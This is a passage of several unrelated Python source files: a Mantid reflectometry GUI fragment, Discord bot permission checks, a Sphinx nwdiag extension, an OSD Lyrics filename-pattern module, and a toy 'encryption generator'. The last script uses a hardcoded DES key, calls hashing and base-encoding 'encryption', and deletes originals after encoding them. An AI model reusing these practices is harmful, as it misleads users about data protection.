OutputWorkspace=out_ws_name, Params=0.02, StartOverlap=10.0, EndOverlap=12.0, Version=1) elif size == 2: trans1 = converter.get_workspace_from_list(0) trans2 = converter.get_workspace_from_list(1) transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1, OutputWorkspace=out_ws_name, SecondTransmissionRun=trans2, Params=0.02, StartOverlap=10.0, EndOverlap=12.0, Version=1) else: raise RuntimeError("Up to 2 transmission runs can be specified. No more than that.") # Load the runs required ConvertToWavelength will deal with the transmission runs, while .to_workspace will deal with the run itself ws = ConvertToWavelength.to_workspace(loadedRun, ws_prefix="") if self.__alg_use: if self.tableMain.item(row, self.scale_col).text(): factor = float(self.tableMain.item(row, self.scale_col).text()) else: factor = 1.0 if self.tableMain.item(row, 15).text(): Qstep = float(self.tableMain.item(row, 15).text()) else: Qstep = None if len(self.tableMain.item(row, which * 5 + 3).text()) > 0: Qmin = float(self.tableMain.item(row, which * 5 + 3).text()) else: Qmin = None if len(self.tableMain.item(row, which * 5 + 4).text()) > 0: Qmax = float(self.tableMain.item(row, which * 5 + 4).text()) else: Qmax = None # If we're dealing with a workspace group, we'll manually map execution over each group member # We do this so we can get ThetaOut correctly (see ticket #10597 for why we can't at the moment) if isinstance(ws, WorkspaceGroup): wqGroupBinned = [] wqGroup = [] wlamGroup = [] thetaGroup = [] group_trans_ws = transmission_ws for i in range(0, ws.size()): # If the transmission workspace is a group, we'll use it pair-wise with the tof workspace group if isinstance(transmission_ws, WorkspaceGroup): group_trans_ws = transmission_ws[i] alg = AlgorithmManager.create("ReflectometryReductionOneAuto") alg.initialize() alg.setProperty("InputWorkspace", ws[i]) if group_trans_ws: alg.setProperty("FirstTransmissionRun", group_trans_ws) if angle is not None: alg.setProperty("ThetaIn", angle) alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned_' + str(i + 1)) alg.setProperty("OutputWorkspace", runno + '_IvsQ_' + str(i + 1)) alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam_' + str(i + 1)) alg.setProperty("ScaleFactor", factor) if Qstep is not None: alg.setProperty("MomentumTransferStep", Qstep) if Qmin is not None: alg.setProperty("MomentumTransferMin", Qmin) if Qmax is not None: alg.setProperty("MomentumTransferMax", Qmax) alg.execute() wqBinned = mtd[runno + '_IvsQ_binned_' + str(i + 1)] wq = mtd[runno + '_IvsQ_' + str(i + 1)] wlam = mtd[runno + '_IvsLam_' + str(i + 1)] th = alg.getProperty("ThetaIn").value wqGroupBinned.append(wqBinned) wqGroup.append(wq) wlamGroup.append(wlam) thetaGroup.append(th) wqBinned = GroupWorkspaces(InputWorkspaces=wqGroupBinned, OutputWorkspace=runno + '_IvsQ_binned') wq = GroupWorkspaces(InputWorkspaces=wqGroup, OutputWorkspace=runno + '_IvsQ') wlam = GroupWorkspaces(InputWorkspaces=wlamGroup, OutputWorkspace=runno + '_IvsLam') th = thetaGroup[0] else: alg = AlgorithmManager.create("ReflectometryReductionOneAuto") alg.initialize() alg.setProperty("InputWorkspace", ws) if transmission_ws: alg.setProperty("FirstTransmissionRun", transmission_ws) if angle is not None: alg.setProperty("ThetaIn", angle) alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned') alg.setProperty("OutputWorkspace", runno + '_IvsQ') alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam') alg.setProperty("ScaleFactor", factor) if Qstep is not None: alg.setProperty("MomentumTransferStep", Qstep) if Qmin is not None: alg.setProperty("MomentumTransferMin", Qmin) if Qmax is not None: alg.setProperty("MomentumTransferMax", Qmax) alg.execute() wqBinned = mtd[runno + '_IvsQ_binned'] wq = mtd[runno + '_IvsQ'] wlam = mtd[runno + '_IvsLam'] th = alg.getProperty("ThetaIn").value cleanup() else: wlam, wq, th = quick(loadedRun, trans=transmission_ws, theta=angle, tof_prefix="") if self.__group_tof_workspaces and not isinstance(ws, WorkspaceGroup): if "TOF" in mtd: tof_group = mtd["TOF"] if not tof_group.contains(loadedRun): tof_group.add(loadedRun) else: tof_group = GroupWorkspaces(InputWorkspaces=loadedRun, OutputWorkspace="TOF") if ':' in runno: runno = runno.split(':')[0] if ',' in runno: runno = runno.split(',')[0] if isinstance(wq, WorkspaceGroup): inst = wq[0].getInstrument() else: inst = wq.getInstrument() lmin = inst.getNumberParameter('LambdaMin')[0] lmax = inst.getNumberParameter('LambdaMax')[0] qmin = 4 * math.pi / lmax * math.sin(th * math.pi / 180) qmax = 4 * math.pi / lmin * math.sin(th * math.pi / 180) return th, qmin, qmax, wlam, wqBinned, wq def _save_table_contents(self, filename): """ Save the contents of the table """ try: writer = csv.writer(open(filename, "wb")) for row in range(self.tableMain.rowCount()): rowtext = [] for column in range(self.tableMain.columnCount() - 2): rowtext.append(self.tableMain.item(row, column).text()) if len(rowtext) > 0: writer.writerow(rowtext) self.current_table = filename logger.notice("Saved file to " + filename) self.mod_flag = False except: return False self.mod_flag = False return True def _save(self, failsave=False): """ Save the table, showing no interface if not necessary. This also provides the failing save functionality. """ filename = '' if failsave: # this is an emergency autosave as the program is failing logger.error( "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.") msgBox = QtGui.QMessageBox() msgBox.setText( "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.\n" "Please check the log for details.") msgBox.setStandardButtons(QtGui.QMessageBox.Ok) msgBox.setIcon(QtGui.QMessageBox.Critical) msgBox.setDefaultButton(QtGui.QMessageBox.Ok) msgBox.setEscapeButton(QtGui.QMessageBox.Ok) msgBox.exec_() import datetime failtime = datetime.datetime.today().strftime('%Y-%m-%d_%H-%M-%S') if self.current_table: filename = self.current_table.rsplit('.', 1)[0] + "_recovered_" + failtime + ".tbl" else: mantidDefault = config['defaultsave.directory'] if os.path.exists(mantidDefault): filename = os.path.join(mantidDefault, "mantid_reflectometry_recovered_" + failtime + ".tbl") else: import tempfile tempDir = tempfile.gettempdir() filename = os.path.join(tempDir, "mantid_reflectometry_recovered_" + failtime + ".tbl") else: # this is a save-on-quit or file->save if self.current_table: filename = self.current_table else: saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table") saveDialog.setFileMode(QtGui.QFileDialog.AnyFile) saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)") saveDialog.setDefaultSuffix("tbl") saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave) if saveDialog.exec_(): filename = saveDialog.selectedFiles()[0] else: return False return self._save_table_contents(filename) def _save_as(self): """ show the save as dialog and save to a .tbl file with that name """ saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table") saveDialog.setFileMode(QtGui.QFileDialog.AnyFile) saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)") saveDialog.setDefaultSuffix("tbl") saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave) if saveDialog.exec_(): filename = saveDialog.selectedFiles()[0] self._save_table_contents(filename) def _load_table(self): """ Load a .tbl file from disk """ self.loading = True loadDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Open Table") loadDialog.setFileMode(QtGui.QFileDialog.ExistingFile) loadDialog.setNameFilter("Table Files (*.tbl);;All files (*)") if loadDialog.exec_(): try: # before loading make sure you give them a chance to save if self.mod_flag: ret, _saved = self._save_check() if ret == QtGui.QMessageBox.RejectRole: # if they hit cancel abort the load self.loading = False return self._reset_table() filename = loadDialog.selectedFiles()[0] self.current_table = filename reader = csv.reader(open(filename, "rb")) row = 0 for line in reader: if row < 100: for column in range(self.tableMain.columnCount() - 2): item = QtGui.QTableWidgetItem() item.setText(line[column]) self.tableMain.setItem(row, column, item) row = row + 1 except: logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.') self.loading = False self.mod_flag = False def _reload_table(self): """ Reload the last loaded file from disk, replacing anything in the table already """ self.loading = True filename = self.current_table if filename: if self.mod_flag: msgBox = QtGui.QMessageBox() msgBox.setText( "The table has been modified. Are you sure you want to reload the table and lose your changes?") msgBox.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No) msgBox.setIcon(QtGui.QMessageBox.Question) msgBox.setDefaultButton(QtGui.QMessageBox.Yes) msgBox.setEscapeButton(QtGui.QMessageBox.No) ret = msgBox.exec_() if ret == QtGui.QMessageBox.No: # if they hit No abort the reload self.loading = False return try: self._reset_table() reader = csv.reader(open(filename, "rb")) row = 0 for line in reader: if row < 100: for column in range(self.tableMain.columnCount() - 2): item = QtGui.QTableWidgetItem() item.setText(line[column]) self.tableMain.setItem(row, column, item) row = row + 1 self.mod_flag = False except: logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.') else: logger.notice('No file in table to reload.') self.loading = False def _save_workspaces(self): """ Shows the export dialog for saving workspaces to non mantid formats """ try: Dialog = QtGui.QDialog() u = Ui_SaveWindow() u.setupUi(Dialog) Dialog.exec_() except Exception as ex: logger.notice("Could not open save workspace dialog") logger.notice(str(ex)) def _options_dialog(self): """ Shows the dialog for setting options regarding live data """ try: dialog_controller = ReflOptions(def_method=self.live_method, def_freq=self.live_freq, def_alg_use=self.__alg_use, def_icat_download=self.__icat_download, def_group_tof_workspaces=self.__group_tof_workspaces, def_stitch_right=self.__scale_right) if dialog_controller.exec_(): # Fetch the settings back off the controller self.live_freq = dialog_controller.frequency() self.live_method = dialog_controller.method() self.__alg_use = dialog_controller.useAlg() self.__icat_download = dialog_controller.icatDownload() self.__group_tof_workspaces = dialog_controller.groupTOFWorkspaces() self.__scale_right = dialog_controller.stitchRight() # Persist the settings settings = QtCore.QSettings() settings.beginGroup(self.__live_data_settings) settings.setValue(self.__live_data_frequency_key, self.live_freq) settings.setValue(self.__live_data_method_key, self.live_method) settings.endGroup() settings.beginGroup(self.__generic_settings) settings.setValue(self.__ads_use_key, self.__alg_use) settings.setValue(self.__icat_download_key, self.__icat_download) settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces) settings.setValue(self.__stitch_right_key, self.__scale_right) settings.endGroup() del settings except Exception as ex: logger.notice("Problem opening options dialog or problem retrieving values from dialog") logger.notice(str(ex)) def _choose_columns(self): """ shows the choose columns dialog for hiding and revealing of columns """ try: dialog = ReflChoose(self.shown_cols, self.tableMain) if dialog.exec_(): settings = QtCore.QSettings() settings.beginGroup(self.__column_settings) for key, value in dialog.visiblestates.iteritems(): self.shown_cols[key] = value settings.setValue(str(key), value) if value: self.tableMain.showColumn(key) else: self.tableMain.hideColumn(key) settings.endGroup() del settings except Exception as ex: logger.notice("Could not open choose columns dialog") logger.notice(str(ex)) def _show_help(self): """ Launches the wiki page for this interface """ import webbrowser webbrowser.open('http://www.mantidproject.org/ISIS_Reflectometry_GUI') def getLogValue(wksp, field=''): """ returns the last value from a sample log """ ws = getWorkspace(wksp) log = ws.getRun().getLogData(field).value if isinstance(log, int) or isinstance(log, str): return log else: return log[-1] def getWorkspace(wksp, report_error=True): """ Gets the first workspace associated with the given string. Does not load. """ if isinstance(wksp, Workspace): return wksp elif isinstance(wksp, str): exists = mtd.doesExist(wksp) if not exists: if report_error: logger.error("Unable to get workspace: " + str(wksp)) return exists # Doesn't exist else: return exists # Doesn't exist elif isinstance(mtd[wksp], WorkspaceGroup): wout = mtd[wksp][0] else: wout = mtd[wksp] return wout
Jonqora/whiskers
checks.py
from discord.ext import commands import discord.utils def is_owner_check(ctx): author = str(ctx.message.author) owner = ctx.bot.config['master'] return author == owner def is_owner(): return commands.check(is_owner_check) def check_permissions(ctx, perms): #if is_owner_check(ctx): # return True if not perms: return False ch = ctx.message.channel author = ctx.message.author resolved = ch.permissions_for(author) return all(getattr(resolved, name, None) == value for name, value in perms.items()) def role_or_permissions(ctx, check, **perms): if check_permissions(ctx, perms): return True ch = ctx.message.channel author = ctx.message.author if ch.is_private: return False # can't have roles in PMs role = discord.utils.find(check, author.roles) return role is not None def serverowner_or_permissions(**perms): def predicate(ctx): owner = ctx.message.server.owner if ctx.message.author.id == owner.id: return True return check_permissions(ctx,perms) return commands.check(predicate) def serverowner(): return serverowner_or_permissions() def check_wantchannel(ctx): if ctx.message.server is None: return False channel = ctx.message.channel server = ctx.message.server try: want_channels = ctx.bot.server_dict[server]['want_channel_list'] except KeyError: return False if channel in want_channels: return True def check_citychannel(ctx): if ctx.message.server is None: return False channel = ctx.message.channel.name server = ctx.message.server try: city_channels = ctx.bot.server_dict[server]['city_channels'].keys() except KeyError: return False if channel in city_channels: return True def check_raidchannel(ctx): if ctx.message.server is None: return False channel = ctx.message.channel server = ctx.message.server try: raid_channels = ctx.bot.server_dict[server]['raidchannel_dict'].keys() except KeyError: return False if channel in raid_channels: return True def check_eggchannel(ctx): if ctx.message.server is None: return False channel = ctx.message.channel server = ctx.message.server try: type = ctx.bot.server_dict[server]['raidchannel_dict'][channel]['type'] except KeyError: return False if type == 'egg': return True def check_raidactive(ctx): if ctx.message.server is None: return False channel = ctx.message.channel server = ctx.message.server try: return ctx.bot.server_dict[server]['raidchannel_dict'][channel]['active'] except KeyError: return False def check_raidset(ctx): if ctx.message.server is None: return False server = ctx.message.server try: return ctx.bot.server_dict[server]['raidset'] except KeyError: return False def check_wildset(ctx): if ctx.message.server is None: return False server = ctx.message.server try: return ctx.bot.server_dict[server]['wildset'] except KeyError: return False def check_wantset(ctx): if ctx.message.server is None: return False server = ctx.message.server try: return ctx.bot.server_dict[server]['wantset'] except KeyError: return False def check_teamset(ctx): if ctx.message.server is None: return False server = ctx.message.server try: return ctx.bot.server_dict[server]['team'] except KeyError: return False def teamset(): def predicate(ctx): return check_teamset(ctx) return commands.check(predicate) def wantset(): def predicate(ctx): return check_wantset(ctx) return commands.check(predicate) def wildset(): def predicate(ctx): return check_wildset(ctx) return commands.check(predicate) def raidset(): def predicate(ctx): return check_raidset(ctx) return commands.check(predicate) def citychannel(): def predicate(ctx): return check_citychannel(ctx) return commands.check(predicate) def wantchannel(): def predicate(ctx): if check_wantset(ctx): return check_wantchannel(ctx) return commands.check(predicate) def raidchannel(): def predicate(ctx): return check_raidchannel(ctx) return commands.check(predicate) def notraidchannel(): def predicate(ctx): return not check_raidchannel(ctx) return commands.check(predicate) def activeraidchannel(): def predicate(ctx): if check_raidchannel(ctx): return check_raidactive(ctx) return commands.check(predicate) def cityraidchannel(): def predicate(ctx): if check_raidchannel(ctx) == True: return True elif check_citychannel(ctx) == True: return True return commands.check(predicate) def cityeggchannel(): def predicate(ctx): if check_raidchannel(ctx) == True: if check_eggchannel(ctx) == True: return True elif check_citychannel(ctx) == True: return True return commands.check(predicate)
bboalimoe/ndn-cache-policy
docs/sphinx-contrib/nwdiag/sphinxcontrib/nwdiag.py
# -*- coding: utf-8 -*- """ nwdiag.sphinx_ext ~~~~~~~~~~~~~~~~~~~~ Allow nwdiag-formatted diagrams to be included in Sphinx-generated documents inline. :copyright: Copyright 2010 by Takeshi Komiya. :license: BSDL. """ from __future__ import absolute_import import os import re import traceback from collections import namedtuple from docutils import nodes from sphinx import addnodes from sphinx.util.osutil import ensuredir import nwdiag.utils.rst.nodes import nwdiag.utils.rst.directives from blockdiag.utils.bootstrap import detectfont from blockdiag.utils.compat import u, string_types from blockdiag.utils.fontmap import FontMap # fontconfig; it will be initialized on `builder-inited` event. fontmap = None class nwdiag_node(nwdiag.utils.rst.nodes.nwdiag): def to_drawer(self, image_format, builder, **kwargs): if 'filename' in kwargs: filename = kwargs.pop('filename') else: filename = self.get_abspath(image_format, builder) antialias = builder.config.nwdiag_antialias image = super(nwdiag_node, self).to_drawer(image_format, filename, fontmap, antialias=antialias, **kwargs) for node in image.diagram.traverse_nodes(): node.href = resolve_reference(builder, node.href) return image def get_relpath(self, image_format, builder): options = dict(antialias=builder.config.nwdiag_antialias, fontpath=builder.config.nwdiag_fontpath, fontmap=builder.config.nwdiag_fontmap, format=image_format) outputdir = getattr(builder, 'imgpath', builder.outdir) return os.path.join(outputdir, self.get_path(**options)) def get_abspath(self, image_format, builder): options = dict(antialias=builder.config.nwdiag_antialias, fontpath=builder.config.nwdiag_fontpath, fontmap=builder.config.nwdiag_fontmap, format=image_format) if hasattr(builder, 'imgpath'): outputdir = os.path.join(builder.outdir, '_images') else: outputdir = builder.outdir path = os.path.join(outputdir, self.get_path(**options)) ensuredir(os.path.dirname(path)) return path class Nwdiag(nwdiag.utils.rst.directives.NwdiagDirective): node_class = nwdiag_node def node2image(self, node, diagram): return node def resolve_reference(builder, href): if href is None: return None pattern = re.compile(u("^:ref:`(.+?)`"), re.UNICODE) matched = pattern.search(href) if matched is None: return href else: refid = matched.group(1) domain = builder.env.domains['std'] node = addnodes.pending_xref(refexplicit=False) xref = domain.resolve_xref(builder.env, builder.current_docname, builder, 'ref', refid, node, node) if xref: if 'refid' in xref: return "#" + xref['refid'] else: return xref['refuri'] else: builder.warn('undefined label: %s' % refid) return None def html_render_svg(self, node): image = node.to_drawer('SVG', self.builder, filename=None, nodoctype=True) image.draw() if 'align' in node['options']: align = node['options']['align'] self.body.append('<div align="%s" class="align-%s">' % (align, align)) self.context.append('</div>\n') else: self.body.append('<div>') self.context.append('</div>\n') # reftarget for node_id in node['ids']: self.body.append('<span id="%s"></span>' % node_id) # resize image size = image.pagesize().resize(**node['options']) self.body.append(image.save(size)) self.context.append('') def html_render_clickablemap(self, image, width_ratio, height_ratio): href_nodes = [node for node in image.nodes if node.href] if not href_nodes: return self.body.append('<map name="map_%d">' % id(image)) for node in href_nodes: x1, y1, x2, y2 = image.metrics.cell(node) x1 *= width_ratio x2 *= width_ratio y1 *= height_ratio y2 *= height_ratio areatag = '<area shape="rect" coords="%s,%s,%s,%s" href="%s">' % (x1, y1, x2, y2, node.href) self.body.append(areatag) self.body.append('</map>') def html_render_png(self, node): image = node.to_drawer('PNG', self.builder) if not os.path.isfile(image.filename): image.draw() image.save() # align if 'align' in node['options']: align = node['options']['align'] self.body.append('<div align="%s" class="align-%s">' % (align, align)) self.context.append('</div>\n') else: self.body.append('<div>') self.context.append('</div>') # link to original image relpath = node.get_relpath('PNG', self.builder) if 'width' in node['options'] or 'height' in node['options'] or 'scale' in node['options']: self.body.append('<a class="reference internal image-reference" href="%s">' % relpath) self.context.append('</a>') else: self.context.append('') # <img> tag original_size = image.pagesize() resized = original_size.resize(**node['options']) img_attr = dict(src=relpath, width=resized.width, height=resized.height) if any(node.href for node in image.nodes): img_attr['usemap'] = "#map_%d" % id(image) width_ratio = float(resized.width) / original_size.width height_ratio = float(resized.height) / original_size.height html_render_clickablemap(self, image, width_ratio, height_ratio) if 'alt' in node['options']: img_attr['alt'] = node['options']['alt'] self.body.append(self.starttag(node, 'img', '', empty=True, **img_attr)) def html_visit_nwdiag(self, node): try: image_format = get_image_format_for(self.builder) if image_format.upper() == 'SVG': html_render_svg(self, node) else: html_render_png(self, node) except UnicodeEncodeError: if self.builder.config.nwdiag_debug: traceback.print_exc() msg = ("nwdiag error: UnicodeEncodeError caught " "(check your font settings)") self.builder.warn(msg) raise nodes.SkipNode except Exception as exc: if self.builder.config.nwdiag_debug: traceback.print_exc() self.builder.warn('dot code %r: %s' % (node['code'], str(exc))) raise nodes.SkipNode def html_depart_nwdiag(self, node): self.body.append(self.context.pop()) self.body.append(self.context.pop()) def get_image_format_for(builder): if builder.format == 'html': image_format = builder.config.nwdiag_html_image_format.upper() elif builder.format == 'latex': if builder.config.nwdiag_tex_image_format: image_format = builder.config.nwdiag_tex_image_format.upper() else: image_format = builder.config.nwdiag_latex_image_format.upper() else: image_format = 'PNG' if image_format.upper() not in ('PNG', 'PDF', 'SVG'): raise ValueError('unknown format: %s' % image_format) if image_format.upper() == 'PDF': try: import reportlab # NOQA: importing test except ImportError: raise ImportError('Could not output PDF format. Install reportlab.') return image_format def on_builder_inited(self): # show deprecated message if self.builder.config.nwdiag_tex_image_format: self.builder.warn('nwdiag_tex_image_format is deprecated. Use nwdiag_latex_image_format.') # initialize fontmap global fontmap try: fontmappath = self.builder.config.nwdiag_fontmap fontmap = FontMap(fontmappath) except: fontmap = FontMap(None) try: fontpath = self.builder.config.nwdiag_fontpath if isinstance(fontpath, string_types): fontpath = [fontpath] if fontpath: config = namedtuple('Config', 'font')(fontpath) fontpath = detectfont(config) fontmap.set_default_font(fontpath) except: pass def on_doctree_resolved(self, doctree, docname): if self.builder.format == 'html': return try: image_format = get_image_format_for(self.builder) except Exception as exc: if self.builder.config.nwdiag_debug: traceback.print_exc() self.builder.warn('nwdiag error: %s' % exc) for node in doctree.traverse(nwdiag_node): node.parent.remove(node) return for node in doctree.traverse(nwdiag_node): try: relfn = node.get_relpath(image_format, self.builder) image = node.to_drawer(image_format, self.builder) if not os.path.isfile(image.filename): image.draw() image.save() image = nodes.image(uri=image.filename, candidates={'*': relfn}, **node['options']) node.parent.replace(node, image) except Exception as exc: if self.builder.config.nwdiag_debug: traceback.print_exc() self.builder.warn('dot code %r: %s' % (node['code'], str(exc))) node.parent.remove(node) def setup(app): app.add_node(nwdiag_node, html=(html_visit_nwdiag, html_depart_nwdiag)) app.add_directive('nwdiag', Nwdiag) app.add_config_value('nwdiag_fontpath', None, 'html') app.add_config_value('nwdiag_fontmap', None, 'html') app.add_config_value('nwdiag_antialias', False, 'html') app.add_config_value('nwdiag_debug', False, 'html') app.add_config_value('nwdiag_html_image_format', 'PNG', 'html') app.add_config_value('nwdiag_tex_image_format', None, 'html') # backward compatibility for 0.6.1 app.add_config_value('nwdiag_latex_image_format', 'PNG', 'html') app.connect("builder-inited", on_builder_inited) app.connect("doctree-resolved", on_doctree_resolved)
ihacklog/osdlyrics
python/pattern.py
# -*- coding: utf-8 -*- # # Copyright (C) 2011 Tiger Soldier # # This file is part of OSD Lyrics. # # OSD Lyrics is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # OSD Lyrics is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with OSD Lyrics. If not, see <http://www.gnu.org/licenses/>. #/ import consts import urlparse import urllib import os.path from errors import PatternException def expand_file(pattern, metadata): """ Expands the pattern to a file name according to the infomation of a music The following are supported place holder in the pattern: - %t: Title of the track. 'title' in metadata - %p: Performer (artist) of the music. 'artist' in metadata - %a: Album of the music. 'album' in metadata - %n: Track number of the music. 'tracknumber' in metadata - %f: Filename without extension of the music. 'location' in metadata. - %%: The `%' punctuation Arguments: - `pattern`: The pattern to expand. - `metadata`: A dict representing metadata. Useful keys are listed above. If the pattern cannot be expand, raise an PatternException. Otherwise return the expended pattern. >>> metadata = {'artist': 'Foo', ... 'title': 'Bar', ... 'tracknumber': '1', ... 'album': 'Album', ... 'location': 'file:///%E6%AD%8C%E6%9B%B2/%E7%9A%84/%E5%9C%B0%E5%9D%80.mp3'} >>> expand_file('%p - %t', metadata) 'Foo - Bar' >>> expand_file('foobar', metadata) 'foobar' >>> print expand_file('name is %f :)', metadata) name is 地址 :) >>> expand_file('%something else', metadata) '%something else' >>> expand_file('%%a - %%t', metadata) '%a - %t' >>> expand_file('%%%', metadata) '%%' >>> expand_file('%n - %a:%p,%t', metadata) '1 - Album:Foo,Bar' >>> expand_file('%t', {}) Traceback (most recent call last): ... PatternException: 'title not in metadata' """ keys = {'t': 'title', 'p': 'artist', 'a': 'album', 'n': 'tracknum', } start = 0 parts = [] while start < len(pattern): end = pattern.find('%', start) if end > -1: parts.append(pattern[start:end]) has_tag = False if end + 1 < len(pattern): tag = pattern[end + 1] if tag == '%': has_tag = True parts.append('%') elif tag == 'f': location = metadata.location if not location: raise PatternException('Location not found in metadata') uri = urlparse.urlparse(location) if uri.scheme != '' and not uri.scheme in ['file']: raise PatternException('Unsupported file scheme %s' % uri.scheme) if uri.scheme == '': path = uri.path else: path = urllib.url2pathname(uri.path) basename = os.path.basename(path) root, ext = os.path.splitext(basename) has_tag = True parts.append(root) elif tag in keys: value = getattr(metadata, keys[tag]) if not value: raise PatternException('%s not in metadata' % keys[tag]) has_tag = True parts.append(value) if has_tag: start = end + 2 else: start = end + 1 parts.append('%') else: parts.append(pattern[start:]) break return ''.join(parts) def expand_path(pattern, metadata): """ Expands the pattern to a directory path according to the infomation of a music The pattern can be one of the three forms: - begin with `/': the path is an absolute path and will not be expanded - begin with `~/': the path is an relative path and the `~' wiil be expanded to the absolute path of the user's home directory - `%': the path will be expanded to the directory of the music file according to its URI. ``location`` attribute is used in metadata Arguments: - `pattern`: The pattern to expand. - `metadata`: A dict representing metadata. Useful keys are listed above. If the pattern cannot be expand, raise an PatternException. Otherwise return the expended pattern. >>> expand_path('%', {'location': 'file:///tmp/a.lrc'}) '/tmp' >>> expand_path('%foo', {'location': 'file:///tmp/a.lrc'}) '%foo' >>> expand_path('/bar', {}) '/bar' >>> expand_path('%', {'Title': 'hello'}) Traceback (most recent call last): ... PatternException: 'Location not found in metadata' """ if pattern == '%': location = metadata.location if not location: raise PatternException('Location not found in metadata') uri = urlparse.urlparse(location) if not uri.scheme in ['file']: raise PatternException('Unsupported file scheme %s' % uri.scheme) path = urllib.url2pathname(uri.path) return os.path.dirname(path) return os.path.expanduser(pattern) if __name__ == '__main__': import doctest doctest.testmod()
P1d0f/encryptGen
encryption-generator.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # encryption-generator.py # # Copyright 2016 Netuser <zorgonteam@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # encryption-generator.py Version 2.0 # site http://zorgonteam.wordpress.com import os import sys import time import base64 import urllib import hashlib import subprocess from datetime import date from datetime import datetime from Crypto.Cipher import DES from Crypto import Random date=date.today() now=datetime.now() if os.name in ['nt','win32']: os.system('cls') else: os.system('clear') print "[*] Author Netuser [*]" print "[*] encryption generator [*]" print "[*] date :",date," [*]" print print "[*] Encrypt With Strong Crypto is Coming soon" back = 'back' #while back == 'back': while True: try: menu=raw_input('\n[*] encrypt or decrypt $ ') menu_item="update" if menu_item == menu: print "[*] Updating Databases Information .... " url=urllib.urlretrieve("https://raw.githubusercontent.com/P1d0f/encryptGen/master/encryption-generator.py","encryption-generator.py") print "[*] Update Succesfully" sys.exit() menu_item="help" if menu == menu_item: print """ you just type encrypt or decrypt example : encrypt = encrypt or decrypt $ encrypt (enter) decrypt = encrypt or decrypt $ decrypt (enter) """ menu_item="encrypt" if menu == menu_item: print print "----> md5" print "----> sha1" print "----> sha224" print "----> sha256" print "----> sha384" print "----> sha512" print "----> base16" print "----> base32" print "----> base64" print "----> cryptoDES" print raw=raw_input('[*] type and choice one $ ') menu_item="exit" if raw == menu_item: print "[*] thanks for shopping" sys.exit() menu_item="cryptoDES" if menu_item == raw: telo=raw_input('[*] your text $ ') iv=Random.get_random_bytes(8) des1=DES.new('01234567', DES.MODE_CFB, iv) des2=DES.new('01234567', DES.MODE_CFB, iv) text=telo cipher_text=des2.encrypt(text) nama_file=open('text.encrypt','w') nama_file.writelines(cipher_text) nama_file.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] saved into text.encrypt" menu_item="base16" if menu_item == raw: telo=raw_input('[*] text $ ') base16=base64.b16encode('%s' % (telo)) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] result :",base16 menu_item="sha224" if menu_item == raw: telo=raw_input('[*] text $ ') sha224=hashlib.sha224('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha224 menu_item="sha384" if menu_item == raw: telo=raw_input('[*] text $ ') sha384=hashlib.sha384('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha384 menu_item="sha512" if menu_item == raw: telo=raw_input('[*] text $ ') sha512=hashlib.sha512('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha512 menu_item="base64" if menu_item == raw: telo=raw_input('[*] text $ ') base64=base64.b64encode('%s' % (telo)) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] result :",base64 menu_item="md5" if menu_item == raw: telo=raw_input('[*] text $ ') md5=hashlib.md5('%s' % (telo)).hexdigest() for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",md5 menu_item="sha256" if menu_item == raw: telo=raw_input('[*] text $ ') sha256=hashlib.sha256('%s' % (telo)).hexdigest() print for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",sha256 menu_item="sha1" if menu_item == raw: telo=raw_input('[*] text $ ') sha1=hashlib.sha1('%s' % (telo)).hexdigest() print for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",sha1 menu_item="base32" if menu_item == raw: ff=raw_input('[*] text or file $ ') menu_fuck="text" if menu_fuck == ff: telo=raw_input('text $ ') base32=base64.b32encode('%s' % (telo)) print for i in(1,2,3,4,5): print "[*] encoded at",now print "\n[*] result :",base32 menu_ss="file" if menu_ss == ff: try: print "[*] WARNING : if you encrypt this file your file original will be remove !" fileno=raw_input('\n[*] file to encrypt $ ') baca=open('%s' % (fileno), 'r') ss=baca.read() decrypt=base64.b32encode(ss) simpan=open('text.enc','w') simpan.writelines(decrypt) simpan.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] saved to text.enc" os.remove(fileno) except IOError: print "\n[*] no file found",fileno sys.exit() 